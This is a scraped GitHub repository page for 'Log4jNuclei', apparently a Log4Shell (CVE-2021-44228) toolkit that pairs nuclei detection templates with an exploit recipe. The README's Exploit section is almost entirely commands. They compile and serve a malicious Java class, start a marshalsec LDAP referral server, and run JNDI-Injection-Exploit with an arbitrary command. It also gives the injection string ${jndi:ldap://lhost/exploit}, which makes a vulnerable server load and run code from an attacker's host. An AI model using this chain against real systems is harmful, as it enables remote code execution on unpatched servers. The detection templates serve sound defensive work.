Log4jNuclei

CVE-2021-44228

Log4j for nuclei

Exploit

javac Exploit.java
python3 -m http.server 80
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1/#Exploit

insert log ${jndi:ldap://lhost/exploit}
///////

java -jar exploit/JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C 'here_command' -A 0.0.0.0

Reference

https://cloud.tencent.com/developer/article/1653754 https://www.freebuf.com/vuls/208339.html

Name		Name	Last commit message	Last commit date
Latest commit History 11 Commits
exploit		exploit
README.md		README.md
log4j-detect-waf.yaml		log4j-detect-waf.yaml
log4j-detect.yaml		log4j-detect.yaml

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Log4jNuclei

CVE-2021-44228

Exploit

Reference

About

Releases

Packages

Languages

numanturle/Log4jNuclei

Folders and files

Latest commit

History

Repository files navigation

Log4jNuclei

CVE-2021-44228

Exploit

Reference

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages